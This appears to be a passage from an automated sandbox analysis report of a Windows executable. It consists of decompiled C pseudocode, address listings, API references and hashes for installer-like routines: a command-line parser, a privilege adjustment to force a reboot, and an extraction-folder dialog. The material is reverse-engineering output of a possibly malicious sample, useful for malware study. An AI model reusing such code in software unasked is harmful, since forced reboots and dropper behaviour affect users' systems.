                                                                                                                                                                                                                                            0x00a95d93
                                                                                                                                                                                                                                            0x00a95d9a
                                                                                                                                                                                                                                            0x00a95d9d
                                                                                                                                                                                                                                            0x00a95d9e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d9e
                                                                                                                                                                                                                                            0x00a95d51
                                                                                                                                                                                                                                            0x00a95d5b
                                                                                                                                                                                                                                            0x00a95d72
                                                                                                                                                                                                                                            0x00a960fb
                                                                                                                                                                                                                                            0x00a960fb
                                                                                                                                                                                                                                            0x00a96207
                                                                                                                                                                                                                                            0x00a9620a
                                                                                                                                                                                                                                            0x00a9620b
                                                                                                                                                                                                                                            0x00a9620e
                                                                                                                                                                                                                                            0x00a96217
                                                                                                                                                                                                                                            0x00a95d78
                                                                                                                                                                                                                                            0x00a95d78
                                                                                                                                                                                                                                            0x00a95d80
                                                                                                                                                                                                                                            0x00a95d83
                                                                                                                                                                                                                                            0x00a95d84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d84
                                                                                                                                                                                                                                            0x00a95d5d
                                                                                                                                                                                                                                            0x00a95d5f
                                                                                                                                                                                                                                            0x00a95d62
                                                                                                                                                                                                                                            0x00a95d68
                                                                                                                                                                                                                                            0x00a95d64
                                                                                                                                                                                                                                            0x00a95d64
                                                                                                                                                                                                                                            0x00a95d64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d62
                                                                                                                                                                                                                                            0x00a95d5b
                                                                                                                                                                                                                                            0x00a95d4f
                                                                                                                                                                                                                                            0x00a95d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d9f
                                                                                                                                                                                                                                            0x00a95d9f
                                                                                                                                                                                                                                            0x00a95da5
                                                                                                                                                                                                                                            0x00a95dab
                                                                                                                                                                                                                                            0x00a95dba
                                                                                                                                                                                                                                            0x00a96218
                                                                                                                                                                                                                                            0x00a9621d
                                                                                                                                                                                                                                            0x00a96220
                                                                                                                                                                                                                                            0x00a96221
                                                                                                                                                                                                                                            0x00a96229
                                                                                                                                                                                                                                            0x00a96230
                                                                                                                                                                                                                                            0x00a96247
                                                                                                                                                                                                                                            0x00a9626a
                                                                                                                                                                                                                                            0x00a96272
                                                                                                                                                                                                                                            0x00a96249
                                                                                                                                                                                                                                            0x00a96255
                                                                                                                                                                                                                                            0x00a9625f
                                                                                                                                                                                                                                            0x00a96264
                                                                                                                                                                                                                                            0x00a96264
                                                                                                                                                                                                                                            0x00a96284
                                                                                                                                                                                                                                            0x00a95dc0
                                                                                                                                                                                                                                            0x00a95dc0
                                                                                                                                                                                                                                            0x00a95dca
                                                                                                                                                                                                                                            0x00a95e22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95dcc
                                                                                                                                                                                                                                            0x00a95dce
                                                                                                                                                                                                                                            0x00a95e24
                                                                                                                                                                                                                                            0x00a95e24
                                                                                                                                                                                                                                            0x00a95e2c
                                                                                                                                                                                                                                            0x00a95e47
                                                                                                                                                                                                                                            0x00a95e4a
                                                                                                                                                                                                                                            0x00a961d2
                                                                                                                                                                                                                                            0x00a961e2
                                                                                                                                                                                                                                            0x00a961e7
                                                                                                                                                                                                                                            0x00a961ee
                                                                                                                                                                                                                                            0x00a961f1
                                                                                                                                                                                                                                            0x00a961f1
                                                                                                                                                                                                                                            0x00a961f8
                                                                                                                                                                                                                                            0x00a961f8
                                                                                                                                                                                                                                            0x00a95e50
                                                                                                                                                                                                                                            0x00a95e53
                                                                                                                                                                                                                                            0x00a96109
                                                                                                                                                                                                                                            0x00a9611f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96125
                                                                                                                                                                                                                                            0x00a96137
                                                                                                                                                                                                                                            0x00a9613a
                                                                                                                                                                                                                                            0x00a9613c
                                                                                                                                                                                                                                            0x00a9613e
                                                                                                                                                                                                                                            0x00a9613e
                                                                                                                                                                                                                                            0x00a96141
                                                                                                                                                                                                                                            0x00a96141
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e74
                                                                                                                                                                                                                                            0x00a95e74
                                                                                                                                                                                                                                            0x00a95e77
                                                                                                                                                                                                                                            0x00a95ea0
                                                                                                                                                                                                                                            0x00a95ebd
                                                                                                                                                                                                                                            0x00a95f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95f7f
                                                                                                                                                                                                                                            0x00a95ec3
                                                                                                                                                                                                                                            0x00a95ec3
                                                                                                                                                                                                                                            0x00a95ecc
                                                                                                                                                                                                                                            0x00a95ed4
                                                                                                                                                                                                                                            0x00a95ed6
                                                                                                                                                                                                                                            0x00a95edc
                                                                                                                                                                                                                                            0x00a95edf
                                                                                                                                                                                                                                            0x00a95eea
                                                                                                                                                                                                                                            0x00a95eed
                                                                                                                                                                                                                                            0x00a95f3f
                                                                                                                                                                                                                                            0x00a95f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95eef
                                                                                                                                                                                                                                            0x00a95eef
                                                                                                                                                                                                                                            0x00a95ef2
                                                                                                                                                                                                                                            0x00a95f34
                                                                                                                                                                                                                                            0x00a95ef4
                                                                                                                                                                                                                                            0x00a95ef4
                                                                                                                                                                                                                                            0x00a95ef7
                                                                                                                                                                                                                                            0x00a95f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95ef9
                                                                                                                                                                                                                                            0x00a95ef9
                                                                                                                                                                                                                                            0x00a95efc
                                                                                                                                                                                                                                            0x00a95f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95efe
                                                                                                                                                                                                                                            0x00a95eff
                                                                                                                                                                                                                                            0x00a95f02
                                                                                                                                                                                                                                            0x00a95f16
                                                                                                                                                                                                                                            0x00a95f04
                                                                                                                                                                                                                                            0x00a95f07
                                                                                                                                                                                                                                            0x00a95f0d
                                                                                                                                                                                                                                            0x00a95f46
                                                                                                                                                                                                                                            0x00a95f46
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f09
                                                                                                                                                                                                                                            0x00a95f07
                                                                                                                                                                                                                                            0x00a95f02
                                                                                                                                                                                                                                            0x00a95efc
                                                                                                                                                                                                                                            0x00a95ef7
                                                                                                                                                                                                                                            0x00a95ef2
                                                                                                                                                                                                                                            0x00a95f4c
                                                                                                                                                                                                                                            0x00a95f4e
                                                                                                                                                                                                                                            0x00a95f50
                                                                                                                                                                                                                                            0x00a95f54
                                                                                                                                                                                                                                            0x00a95ed4
                                                                                                                                                                                                                                            0x00a95ea2
                                                                                                                                                                                                                                            0x00a95ea4
                                                                                                                                                                                                                                            0x00a95eaf
                                                                                                                                                                                                                                            0x00a95eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e79
                                                                                                                                                                                                                                            0x00a95e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e83
                                                                                                                                                                                                                                            0x00a95e85
                                                                                                                                                                                                                                            0x00a95e85
                                                                                                                                                                                                                                            0x00a95e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95e94
                                                                                                                                                                                                                                            0x00a95e8e
                                                                                                                                                                                                                                            0x00a95e7d
                                                                                                                                                                                                                                            0x00a95e77
                                                                                                                                                                                                                                            0x00a95e6e
                                                                                                                                                                                                                                            0x00a95e65
                                                                                                                                                                                                                                            0x00a95e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95dd0
                                                                                                                                                                                                                                            0x00a95dce
                                                                                                                                                                                                                                            0x00a95dca
                                                                                                                                                                                                                                            0x00a95dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d00
                                                                                                                                                                                                                                            0x00a95dd9
                                                                                                                                                                                                                                            0x00a95e04
                                                                                                                                                                                                                                            0x00a961fe
                                                                                                                                                                                                                                            0x00a95e0a
                                                                                                                                                                                                                                            0x00a95e0c
                                                                                                                                                                                                                                            0x00a95e17
                                                                                                                                                                                                                                            0x00a95e17
                                                                                                                                                                                                                                            0x00a95e04
                                                                                                                                                                                                                                            0x00a96200
                                                                                                                                                                                                                                            0x00a96200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00A95CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00A98B3E,00000104,00000000,?,?), ref: 00A95DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A95E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00A95EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A95F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A95FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00A96008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A960AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00A91140,00000000,00000040,00000000), ref: 00A961F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00A961F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: b680ee53722b287e4299dbfc0044a42ef724b49219403446623c9fd21d3c862f
                                                                                                                                                                                                                                            • Instruction ID: f7922b3a788ad95304af57be01573b8661f0a84be441bd351db615a2bd9b8b96
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b680ee53722b287e4299dbfc0044a42ef724b49219403446623c9fd21d3c862f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD14471F04A545ADF3BCB7C8C8A7FA3BF1AB16340F1441ABC586CA590DA758E878B40
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A91F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa99a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A944B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A96CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A944B9(0, 0x522, 0xa91140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A91EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a91f64
                                                                                                                                                                                                                                            0x00a91f0e
                                                                                                                                                                                                                                            0x00a91f0e
                                                                                                                                                                                                                                            0x00a91f13
                                                                                                                                                                                                                                            0x00a91f13
                                                                                                                                                                                                                                            0x00a91f14
                                                                                                                                                                                                                                            0x00a91f14
                                                                                                                                                                                                                                            0x00a91f16
                                                                                                                                                                                                                                            0x00a91f17
                                                                                                                                                                                                                                            0x00a91f1a
                                                                                                                                                                                                                                            0x00a91f1f
                                                                                                                                                                                                                                            0x00a91f1f
                                                                                                                                                                                                                                            0x00a91f86
                                                                                                                                                                                                                                            0x00a91f8f
                                                                                                                                                                                                                                            0x00a91fcf
                                                                                                                                                                                                                                            0x00a91fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fd3
                                                                                                                                                                                                                                            0x00a91fa9
                                                                                                                                                                                                                                            0x00a91fb4
                                                                                                                                                                                                                                            0x00a91fbb
                                                                                                                                                                                                                                            0x00a91fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fc3
                                                                                                                                                                                                                                            0x00a91f9a
                                                                                                                                                                                                                                            0x00a91f9a
                                                                                                                                                                                                                                            0x00a91fa2
                                                                                                                                                                                                                                            0x00a91fd9
                                                                                                                                                                                                                                            0x00a91fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a91fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A91EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A91F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00A91FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: 88140ab37c5d4503be0dc35c51196a873d25f5e54a29edb00e9cda1a1ff25a18
                                                                                                                                                                                                                                            • Instruction ID: a646123a72f2c8813302b191a3cbeefe0e6da557f742a3dc99556efa5e8f2452
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88140ab37c5d4503be0dc35c51196a873d25f5e54a29edb00e9cda1a1ff25a18
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521B771B4020A7BDF209BE59C4AFBF76F8EB95B50F20051FFA02D6181DB758802D6A5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A96CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a96cf7
                                                                                                                                                                                                                                            0x00a96d00
                                                                                                                                                                                                                                            0x00a96d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A96E26,?,00A96E26,00A91000), ref: 00A96D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A96E26,00A91000), ref: 00A96D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A96E26,00A91000), ref: 00A96D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                                                            • Instruction ID: a448a85249839b5dfdc511bdbfe7d04634735f13f4465ab32bc9e18ac77d6685
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9a1db699e53e79112050d3aeb33010d7d6a4e29ba8c2a4d9c869ff50931e1a4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CD0C932200108BBDB006BE1EC0CA593F28EB98212F644103F31986030CE3244528B92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A93210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00A943D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lenta");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xa99a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa991e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00A944B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xa991e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xa991e5 - 3;
						if(_t49 - 0xa991e5 < 3) {
							goto L32;
						}
						_t24 =  *0xa991e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xa991e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00A9658A(0xa991e4, 0x104, 0xa91140);
								_t27 = E00A958C8(0xa991e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xa991e4 - 0x5c;
									if( *0xa991e4 != 0x5c) {
										L30:
										_t30 = E00A9597D(0xa991e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xa991e5 - 0x5c;
									if( *0xa991e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00A944B9(_t64, 0x54a, 0xa991e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xa991e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xa991e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xa991e4 - 0x5c;
						if( *0xa991e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xa99124 = 0x800704c7;
						goto L39;
					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0xa99a3c, 0x3e8, 0xa98598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A94224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa987a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a93367
                                                                                                                                                                                                                                            0x00a93369
                                                                                                                                                                                                                                            0x00a9336a
                                                                                                                                                                                                                                            0x00a9336b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9336b
                                                                                                                                                                                                                                            0x00a9331c
                                                                                                                                                                                                                                            0x00a93323
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93329
                                                                                                                                                                                                                                            0x00a9332b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9332b
                                                                                                                                                                                                                                            0x00a9324c
                                                                                                                                                                                                                                            0x00a9324c
                                                                                                                                                                                                                                            0x00a9324f
                                                                                                                                                                                                                                            0x00a932c8
                                                                                                                                                                                                                                            0x00a932ce
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932ce
                                                                                                                                                                                                                                            0x00a93251
                                                                                                                                                                                                                                            0x00a93256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a93271
                                                                                                                                                                                                                                            0x00a93277
                                                                                                                                                                                                                                            0x00a93279
                                                                                                                                                                                                                                            0x00a93298
                                                                                                                                                                                                                                            0x00a9329d
                                                                                                                                                                                                                                            0x00a9329f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a932b0
